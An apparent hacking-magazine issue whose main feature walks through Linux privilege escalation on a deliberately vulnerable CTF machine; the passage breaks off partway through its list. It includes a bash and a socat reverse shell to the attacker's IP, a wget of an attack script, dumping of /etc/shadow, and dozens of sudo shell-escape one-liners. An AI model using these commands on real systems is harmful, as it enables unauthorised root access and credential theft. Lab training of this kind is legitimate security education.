Hackercool

"Then you will know the truth and the truth will set you free."
John 8:32
Editor's Note

Hello aspiring ethical hackers. Hope you are all awesome. We are back with our April 2020 Issue. Linux is the one ubiquitous operating system that you will definitely encounter in ethical hacking. So we decided to give our readers a core guide on Linux Privilege Escalation. Although we wanted to cover the entire tutorial in one Issue, we had some constraints and had to leave a part of this guide to the next Issue. However, we suggest our readers go through this guide well, as it may prove very helpful in your future.

With all the pending Issues done, we are focussing our efforts on improving the quality of our Magazine to make it more helpful for our readers. Those who kept faith in our Magazine will definitely enjoy the reward. We are also planning to bring some new Features to make the magazine more awesome. Also note that we have changed the name of the feature "Not Just Another Tool" to "Tool of The Month" from this Issue.

We are sure our readers will like this Issue. That's all we have for now. Until the next issue, Good Bye. Thank You. Stay Home, Stay Safe.
oh-chakravanthe
"PASSWORDS ARE LIKE UNDERWEAR: DON'T LET PEOPLE SEE IT, CHANGE IT VERY OFTEN, AND YOU SHOULDN'T SHARE IT WITH STRANGERS."
~ CHRIS PIRILLO

INSIDE
See what our Hackercool Magazine April 2020 Issue has in store for you.

- Linux Privilege Escalation:
  Exploiting sudo privileges, kernel exploits, exploiting applications running as root
- Hacking Q&A:
  Answers to questions our readers ask.
- Installit:
  Installing Docker in Kali Linux 2020.
- Metasploit This Month:
  Apache ActiveMQ, Apache James & three Google Chrome exploit modules
- Tool Of The Month:
  Nextnet - The pivot point discovery tool
- Buffer Overflow:
  Part 1
- Metasploitable Tutorials:
  Hacking the GlassFish server running on port 4848.
- Data Breach This Month:
  Email.it
- Online Security:
  Are your Laptop and Mobile cameras secure?

ESCALATE MY PRIVILEGES : 1
LINUX PRIVILEGE ESCALATION
In the field of cyber security, knowledge of Linux plays a major role. From serving the majority of the world's web pages and other services to spreading into the Internet of Things, the role of Linux has only increased. There is a reason for Linux's popularity apart from it being completely open source: it can be customized into whatever we want, be it a server, a mobile OS, firmware, an alternative home OS or a penetration testing distro like Kali Linux or Parrot OS. After repurposing everything, you can publicize it as your own. No doubt it was once called the hacker's operating system, because you can tinker with it as much as you like. After a long period of avoidance, even Microsoft is adopting Linux. The wide spread of this operating system makes it all the more significant in penetration testing. This Feature is meant to help our readers understand how Linux privileges work, why the distinction between user and root privileges matters, and how user privileges can be bypassed to get root privileges.
If you have been a subscriber to our Magazine for a long time (let's say one and a half years), you would have seen many boot-to-root CTF challenges. Changing the terminal's prompt indicator from "$" to "#" was our ultimate goal most of the time. Why is this boot2root so important in CTF challenges? You need to understand Linux privileges to appreciate its significance.

Regular Windows users may know that Windows has two login account types (actually more, but we ignore the Guest and other built-in accounts here): a standard user account and an Administrator account. While installing older versions of Windows, an Administrator account was created by default, which acts as the super user in Windows. In Windows 10, the built-in Administrator account is disabled by default and the user account created during installation is made a member of the Administrators group instead. The super user has complete control over the system.

Similarly, Linux has three types of user accounts: regular, service and the all-powerful root account. Linux also creates a regular (standard) user by default while installing (the user account "kali" in Kali Linux, for example). On many Linux systems nowadays, the root account is not even given a password, or is disabled for login by default, because of the security risk of this all-powerful account falling into the wrong hands. You can compare the root account with the Windows Administrator account, but there is a subtle difference.

Windows has another account by default, known as the SYSTEM account, which is used by the operating system and Windows services. Unlike the Administrator account, you can't log in as SYSTEM. It is an internal account and has FULL control over the system, just like the Administrator account. If our readers look at the many Windows 10 privilege escalation exploits we printed as part of our "Metasploit This Month" Feature, you will notice that at the end we had "SYSTEM" privileges.

The Linux root account has the powers of both the Windows Administrator and SYSTEM accounts. It has absolute control over the Linux system.
Identifiers

In Linux, users are classified into groups, identified by a group identifier (GID), and every user is given a user identifier (UID). It is the UID, not the user name, that the kernel uses for access decisions. As already said, there are three types of user accounts in Linux: the root account, regular user accounts and service accounts. The root account always has UID 0. UIDs from 1 to 99 are reserved for predefined system accounts such as daemon and mail, and the rest of the range below the regular-user threshold is used for other system and service accounts. Where regular users start depends on the distribution: older Red Hat releases allocated them from UID 500, while Debian, Ubuntu and current RHEL/CentOS allocate them from UID 1000 (the threshold is the UID_MIN value in /etc/login.defs). One thing is certain: any account with UID 0 is root, whatever it is called.
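The UID rules above are easy to check on a box you have landed on. The script below is an added example written for this edit, not code from the Hackercool article or from the CTF: it reads UID_MIN from a login.defs excerpt, sorts the accounts in a passwd file into root, system and regular by UID, and lists every UID 0 account that is not named "root", which is the classic sign of a planted root-equivalent account. Both the passwd and the login.defs text are constructed samples; the "backdoor" entry is invented so the check has something to fire on.

```bash
#!/bin/sh
# Added example (not from the Hackercool article): classify passwd entries by
# UID range and flag extra UID 0 accounts. SAMPLE_PASSWD and SAMPLE_LOGIN_DEFS
# are constructed samples, not copied from the CTF machine.

SAMPLE_LOGIN_DEFS='# constructed excerpt of /etc/login.defs
UID_MIN                  1000
UID_MAX                 60000
SYS_UID_MIN               201
SYS_UID_MAX               999'

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
polkitd:x:998:996:User for polkitd:/:/sbin/nologin
armour:x:1000:1000::/home/armour:/bin/bash
backdoor:x:0:0:looks harmless:/tmp:/bin/bash'

# uid_min: the UID_MIN value from login.defs text, defaulting to 1000.
uid_min() {
    min=$(printf '%s\n' "$1" | awk '$1 == "UID_MIN" { print $2; exit }')
    printf '%s\n' "${min:-1000}"
}

# classify_uid: root / system / regular for one UID ($1) given UID_MIN ($2).
classify_uid() {
    if [ "$1" -eq 0 ]; then
        echo root
    elif [ "$1" -lt "$2" ]; then
        echo system
    else
        echo regular
    fi
}

# classify_passwd: print "<class> <name> <uid>" for every passwd entry.
# $1 = passwd text, $2 = login.defs text.
classify_passwd() {
    min=$(uid_min "$2")
    printf '%s\n' "$1" | while IFS=: read -r name _ uid _; do
        printf '%s %s %s\n' "$(classify_uid "$uid" "$min")" "$name" "$uid"
    done
}

# rogue_uid0_accounts: every UID 0 account other than "root". On a healthy
# system this prints nothing; anything it prints is root by another name.
rogue_uid0_accounts() {
    printf '%s\n' "$1" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

classify_passwd "$SAMPLE_PASSWD" "$SAMPLE_LOGIN_DEFS"
echo "--- UID 0 accounts other than root:"
rogue_uid0_accounts "$SAMPLE_PASSWD"
```

On a real target replace the two sample strings with `$(cat /etc/passwd)` and `$(cat /etc/login.defs)`; on an older Red Hat box UID_MIN will read 500 and the classification adjusts itself.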
Linux privilege escalation can be achieved in a number of ways. We are not going to drown you in theory here; you will learn about each method as we do it practically. For this tutorial, we will be using the "Escalate_My_Privilege" CTF machine created by the author "Akanksha Sachin Verma". This CTF machine can be downloaded from the link given below. We are performing this challenge on VMware and our attacker operating system is Kali Linux. So let's start from the beginning. The first stage of penetration testing (i.e. after information gathering) is network scanning. We use Nmap for that.
The IP address of our target is 192.168.36.142. Since we have the IP address, let's scan it for any open ports, with service detection enabled.

Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-...
Nmap scan report for 192.168.36.142
...
22/tcp   open  ssh      ...
| ssh-hostkey: ... 06:df:a2:b9:b5:b9:3b:dd:b6 ...
80/tcp   open  http     ...
|_http-title: ...
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   ...
|   ...                 2049/udp  nfs
|   ...                20048/tcp  mountd
|   ...                20048/udp  mountd
|   ...                46848/tcp  nlockmgr
|   ...                 2049/tcp  nfs_acl
|   ...                 2049/udp  nfs_acl
...
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.35 seconds
Our target has four open ports: SSH, HTTP, rpcbind and NFS. Before we even try to escalate our privileges, we need to get a low privileged shell on the target. Right away we can see that the robots.txt file is disallowing one file named "phpbash.php". Let's go there directly.

phpbash is a standalone, semi-interactive web shell that runs commands on the target as the web server user. Running uname -a in it shows the kernel:

Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

So we have a shell with apache user privileges. Let's see if we can escalate privileges from this account. For this, we use a simple tool called PE.sh that is available on GitHub. It scans the target and tells us the privilege escalation possibilities on the system. We have used it in one of our previous CTF challenges.
On the attacker machine we serve the script with Python's simple HTTP server module on port 8000 and download it to the target's /tmp folder from the web shell:

:/var/www/html# cd /tmp
:/tmp# wget http://192.168.36.130:8000/PE.sh
--2020-05-03 08:20:58--  http://192.168.36.130:8000/PE.sh
Connecting to 192.168.36.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Saving to: 'PE.sh'

2020-05-03 08:20:58 (1.42 MB/s) - 'PE.sh' saved [47500/47500]

:/tmp# chmod 777 PE.sh
chmod: changing permissions of 'PE.sh': Operation not permitted

Although the download is successful, we fail to get execute permission on the file: only the file's owner or root can change its mode, and the copy in /tmp ends up owned by root rather than apache. So we start our search to find another way in.
After browsing the file system, we find a home directory named "armour" in which there is a file named Credentials.txt. The contents of the file appear to be a direct hint to this user's password: it should be the MD5 hash of "rootroot1". Piping that string through md5sum in the web shell gives:

b7bc8489abe360486b4b19dbc242e885  -
:/home/armour#
Let's try this as the password with su:

:/home/armour# su armour
Password: su: Authentication failure

We can't directly log in as user armour from here: this web shell is very restricted and gives su no proper terminal to read the password from. Let's find another way to do this. First we start a netcat listener on the attacker machine:
kali@kali:~$ nc -lvp 1234
Listening on [any] 1234 ...

We can use a simple bash one-liner in the web shell to start a reverse shell to that listener, as shown below.

:/home/armour# bash -i >& /dev/tcp/192.168.36.130/1234 0>&1

As soon as we run the above command, we get another shell on the netcat listener we started:

192.168.36.142: inverse host lookup failed: Unknown host
connect to [192.168.36.130] from (UNKNOWN) [192.168.36.142] ...
bash-4.2$
Let's try to log in now as user "armour" from this shell. Because the reverse shell has no tty, the password is echoed back in clear text:

bash-4.2$ su armour
Password: b7bc8489abe360486b4b19dbc242e885
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)

This works. To get a proper prompt we upgrade the shell to a pseudo-terminal with Python (mind the spelling; two attempts with "pyhton3" and "pty.spwan" failed first):

python3 -c 'import pty;pty.spawn("/bin/bash")'
[armour@my_privilege ~]$
As you can notice, the UID of the user "armour" is 1000, which means he is a standard user. Now let's try privilege escalation. What should we try first? Hmm. What about exploiting sudo privileges? Yeah, let's try that first. Running sudo -l lists what armour is allowed to run as root:
[armour@my_privilege ~]$ sudo -l
Matching Defaults entries for armour on my_privilege:
    ...
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,
        /bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish,
        /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc,
        /usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh,
        /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano,
        /usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk,
        /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red,
        /usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp,
        /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd,
        /usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail,
        /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,
        /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk,
        /usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
        /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip,
        /usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap,
        /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts,
        /usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch,
        /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat,
        /usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace,
        ...,
        /usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp,
        /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul,
        /usr/bin/un expand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,
        ...

So many programs have been given sudo privileges. But what exactly is exploiting sudo rights? We have used this many times in our Magazine previously to get root on the system.
Exploiting SUDO Privileges

In Linux, standard users sometimes need root privileges (the privileges of the super user) to execute certain commands or run certain programs. There are two ways of arranging this. The first is to let the standard user log in as root by giving them the root credentials. Although it looks simple, this is risky: handing out the root password just so that a user can run one command gives them the ability to do anything to the system. That is where sudo comes in handy. sudo lets standard users run specific programs (or commands) with the privileges of the root user, so there is no need for a standard user to log in as the super user at all.

However, sudo has its own risks. The programs which standard users are allowed to execute with root privileges have to be chosen carefully. There is no problem if a standard user is allowed to run the ping command as root, but what if he is allowed to run Nmap as root, or an editor, a pager or an interpreter? Well, you will see. Any program that can execute another command, or read and write arbitrary files, effectively gives away root when it runs under sudo.

Given below are multiple ways of exploiting sudo privileges to gain a root shell on the Linux system.
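Before going through them one by one, here is an added example written for this edit (not code from the Hackercool article): a small POSIX shell script that parses the output of sudo -l and reports which of the allowed commands are known shell escapes, which only give a root-level file read, and which have no escape we know of. SAMPLE_SUDO_L is a constructed sample shaped like the listing above, shortened to a handful of entries; the escapes it knows are the ones demonstrated on this page.

```bash
#!/bin/sh
# Added example, not code from the Hackercool article: audit `sudo -l` output
# and flag every allowed command that is a known shell escape (SHELL) or a
# root-only file reader (READ). SAMPLE_SUDO_L is a constructed sample shaped
# like the listing above; user and host names are taken from the article.

SAMPLE_SUDO_L='Matching Defaults entries for armour on my_privilege:
    !visiblepw, always_set_home, env_reset,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/bash, /usr/bin/awk, /usr/bin/find,
        /usr/bin/env, /bin/ping, /usr/bin/tail, /usr/bin/vim'

# allowed_commands: print one allowed command per line. Lines after the
# "may run the following commands" header lose their "(runas)" prefix and
# any NOPASSWD:/SETENV:-style tags, then are split on commas.
allowed_commands() {
    printf '%s\n' "$1" | awk '
        /may run the following commands/ { in_list = 1; next }
        in_list {
            sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "")
            while (sub(/^(NO)?(PASSWD|SETENV|EXEC|MAIL|FOLLOW):[[:space:]]*/, "")) {}
            n = split($0, part, ",")
            for (i = 1; i <= n; i++) {
                gsub(/^[[:space:]]+|[[:space:]]+$/, "", part[i])
                if (part[i] != "") print part[i]
            }
        }'
}

# escape_for: print the escalation one-liner for a command path, prefixed
# SHELL or READ, or nothing if we know no escape for that binary. The
# escapes listed are the ones demonstrated in the sections of this page.
escape_for() {
    name=${1##*/}
    case "$name" in
        bash|sh|dash|zsh|ksh|csh|tcsh|fish)
            printf 'SHELL sudo %s\n' "$1" ;;
        awk|gawk|nawk|mawk)
            printf "SHELL sudo %s 'BEGIN {system(\"/bin/sh\")}'\n" "$1" ;;
        find)
            printf 'SHELL sudo %s . -exec /bin/sh \\; -quit\n' "$1" ;;
        env|nice|unshare|ionice)
            printf 'SHELL sudo %s /bin/sh\n' "$1" ;;
        vim|vi)
            printf "SHELL sudo %s -c ':!/bin/sh'\n" "$1" ;;
        less|more)
            printf 'SHELL sudo %s /etc/profile   (then type !/bin/sh at the pager prompt)\n' "$1" ;;
        cat|head|tail|cut|od|nl)
            printf 'READ  sudo %s /etc/shadow\n' "$1" ;;
    esac
}

# audit_sudo_rules: one verdict line per allowed command.
audit_sudo_rules() {
    allowed_commands "$1" | while IFS= read -r cmd; do
        esc=$(escape_for "$cmd")
        if [ -n "$esc" ]; then
            printf '%s\n' "$esc"
        else
            printf 'OK    %s (no known shell escape)\n' "$cmd"
        fi
    done
}

# count_shell_escapes: how many allowed commands hand over a root shell.
count_shell_escapes() {
    audit_sudo_rules "$1" | grep -c '^SHELL '
}

audit_sudo_rules "$SAMPLE_SUDO_L"
```

On a real target feed it `"$(sudo -l 2>/dev/null)"` instead of the sample. The table in escape_for is deliberately small; GTFOBins-style lists are much longer, but the shape of the check is the same: anything in the list that can run a child process or open an arbitrary file is a root shell waiting to happen, and "OK" only means this script knows no escape, not that there is none.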
1. bash

Bash (the Bourne Again SHell) is the GNU replacement for the original Bourne shell and the default shell on most Linux systems. Running it through sudo directly gives a root shell.

[armour@my_privilege html]$ sudo /bin/bash
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
2. tcsh

Tcsh (the TENEX C shell) is an enhanced version of the C shell, csh.

[armour@my_privilege html]$ sudo tcsh
tput: unknown terminal "unknown"
tcsh: using dumb terminal settings
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
3. csh

The C shell (csh) is another Unix shell, with a syntax modelled on the C language.

[armour@my_privilege html]$ sudo csh
csh: using dumb terminal settings
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)

sh, ksh, rksh, zsh, fish and dash are other shells, and sudo privileges on them can be exploited in the same way as shown above.
4. tmux

tmux, the terminal multiplexer, is an alternative to screen with the ability to open multiple windows in one terminal. It can be used to get a root shell too.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo tmux -c /bin/bash
[root@my_privilege html]#
5. scp

scp (secure copy) is used to copy files from one system to another over SSH. Its -S option names the program used to make the connection, so a script of our choosing gets executed as root.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ TF=$(mktemp)
[armour@my_privilege html]$ echo 'sh 0<&2 1>&2' > $TF
[armour@my_privilege html]$ chmod +x "$TF"
[armour@my_privilege html]$ sudo scp -S $TF x y:
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
6. rootsh

rootsh is a shell wrapper that logs all input and output of a session; run with sudo it still gives an interactive root shell.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo rootsh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
7. awk

awk is a text-processing language used for pattern scanning; its system() function runs any command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo awk 'BEGIN {system("/bin/bash")}'
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)

Similar to awk, we also have gawk (GNU awk) and nawk (new awk), which are exploited the same way.
8. ed

ed is a line-oriented text editor with a minimal interface. Its ! command runs a shell command.

[armour@my_privilege html]$ sudo ed
!/bin/bash
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)

Similarly we have "red", which stands for restricted ed. Note that red refuses the ! shell escape, but run through sudo it can still read and write any file as root.
9. env

env prints environment variables, or runs a program in a modified environment; under sudo the program it runs inherits root privileges.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo env /bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
10. chmod

Our readers know that the chmod command is used to change the permissions of a file. Do you remember the file we downloaded onto the target system and were unable to change permissions on? Now we can do it.

[armour@my_privilege ~]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege ~]$ FILE=/tmp/PE.sh
[armour@my_privilege ~]$ sudo chmod 0777 $FILE
[armour@my_privilege ~]$ ls -l /tmp/PE.sh
-rwxrwxrwx 1 root apache 47500 Mar 26 04:31 /tmp/PE.sh

As you can see, the permissions of the file have changed now.
11. chown

Similarly, chown can be exploited as shown below to change the ownership of a file.

[armour@my_privilege ~]$ FILE=/tmp/PE.sh
[armour@my_privilege ~]$ sudo chown $(id -un):$(id -gn) $FILE
[armour@my_privilege ~]$ ls -l /tmp/PE.sh
-rwxrwxrwx 1 armour armour 47500 Mar 26 04:31 /tmp/PE.sh
12. cp

The cp command with sudo privileges can be exploited to copy a file that only root can read into a file of our own. For example, the user doesn't have permission to view /etc/shadow. It can be copied into another file as shown below.

[armour@my_privilege ~]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege ~]$ FILE=/tmp/copied.txt
[armour@my_privilege ~]$ echo "DATA" | sudo cp /etc/shadow "$FILE"
[armour@my_privilege ~]$ cat /tmp/copied.txt
root:$6$...:18313:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7:::
...
sync:*:16372:0:99999:7:::
shutdown:*:16372:0:99999:7:::
halt:*:16372:0:99999:7:::
...
dbus:!!:18313::::::
polkitd:!!:18313::::::
tss:!!:18313::::::
13. cut

The cut command in Linux is used to cut out a part of each line and print the result. Here we can exploit it to do the same to files only root may read.

[armour@my_privilege ~]$ FILE=/etc/shadow
[armour@my_privilege ~]$ sudo cut -d "" -f1 "$FILE"
root:$6$...:18313:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7:::
...

Similarly cat, jq, dd, arp, base64, date, diff, mtr, nl, od, ul, unexpand, wget, xxd, expand, file, finger, fmt, fold, grep and head can be exploited to view files restricted to the normal user.
14. nice

The nice command in Linux is used to execute a program with a modified scheduling priority; under sudo the program it launches runs as root.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo nice /bin/sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
15. ftp

FTP, as you all know, is the File Transfer Protocol; the ftp client's ! command runs a local shell command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo ftp
ftp> !/bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
16. zip

The zip command is used to compress files in Linux. Even this command can be exploited to grab a root shell: -T tests the archive after creation and -TT names the command used for that test.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ TF=$(mktemp -u)
[armour@my_privilege html]$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 65%)
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)

17. mount

The mount command is used to mount file systems, but with sudo privileges it can be exploited to get a root shell as shown below: a bind mount puts /bin/sh in place of /bin/mount, so the next sudo mount actually runs the shell. Remember to umount /bin/mount from the root shell afterwards, or mount stays broken for everyone on the box.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo mount -o bind /bin/sh /bin/mount
[armour@my_privilege html]$ sudo mount
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
18. mysql

mysql is the command-line client for MySQL/MariaDB; its \! command runs a shell command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo mysql -e '\! /bin/bash'
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)

19. node

Node.js can spawn a process with the terminal's standard streams attached to it.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)

20. pip

pip installs Python packages; installing a local package runs its setup.py, here as root.

[armour@my_privilege html]$ TF=$(mktemp -d)
[armour@my_privilege html]$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
[armour@my_privilege html]$ sudo pip install $TF
Processing /tmp/tmp...
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
22. perl

Perl is a programming language installed by default on most Linux systems.

[armour@my_privilege pip-_W7248-build]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege pip-_W7248-build]$ sudo perl -e 'exec "/bin/sh";'
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
23. puppet

Puppet is a configuration management tool; its exec resource runs a command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
24. rsync

rsync (remote sync) is a popular command for copying and synchronizing files and folders between Unix or Linux systems; its -e option names the remote shell program to use.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)

25. ruby

Ruby, as our readers know, is a programming language.
[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo ruby -e 'exec "/bin/sh"'
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
26. sed

sed (stream editor) performs operations like searching and replacing on a file; its e command executes a shell command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo sed -n '1e exec sh 1>&0' /etc/hosts
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
27. setarch

setarch ("set architecture") changes the architecture reported to a program (x86_64 or i386, for example) and then runs that program.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo setarch $(arch) /bin/sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
28. socat

socat stands for SOcket CAT. It is a bidirectional network relay utility like netcat. We have seen privilege escalation using socat in the CTF challenge of Maskcrafter: 1 in our January 2020 issue. It is done as shown below. We first start a listener on the attacker machine:

kali@kali:~$ socat file:`tty`,raw,echo=0 tcp-listen:1235

Then, on the target, we connect back to it with a shell spawned through sudo:

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ RHOST=192.168.36.130
[armour@my_privilege html]$ RPORT=1235
[armour@my_privilege html]$ sudo socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

As soon as we run these commands, we get a root shell on the listener:

# id
uid=0(root) gid=0(root) groups=0(root)
[root@my_privilege html]#
29. stdbuf

stdbuf runs a command with modified buffering for its standard streams.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo stdbuf -i0 /bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
30. strace

strace is a Linux debugging and troubleshooting tool that traces the system calls of the program it runs.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo strace -o /dev/null /bin/sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
31. systemctl

systemctl is the system management tool used to control the systemd system and service manager. Its output goes through a pager, and the pager's ! command runs a shell.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo systemctl
WARNING: terminal is not fully functional
!sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)

32. taskset
taskset sets or retrieves the CPU affinity of a process and then runs the given command.

[armour@my_privilege html]$ sudo taskset 1 /bin/sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
33. tclsh

tclsh is a shell-like application that reads Tcl commands from a file or its standard input. Tcl is a simple scripting language.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo tclsh
% exec /bin/sh <@stdin >@stdout 2>@stderr
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
34. time

The time command is used to see how long a command takes to run. It helps in checking the performance of commands and scripts.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo /usr/bin/time /bin/sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
35. timeout

The timeout command runs a program with a time limit; if the command takes longer than the preset limit, it is killed.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo timeout --foreground 7d /bin/sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
36. unshare

The unshare command runs a program with specific namespaces "unshared" from its parent.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo unshare /bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)

37. xargs
The xargs command reads items from standard input and passes them as arguments to another command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo xargs -a /dev/null sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
38. PHP

PHP is present on this web server; its system() function runs a command.

[armour@my_privilege html]$ id
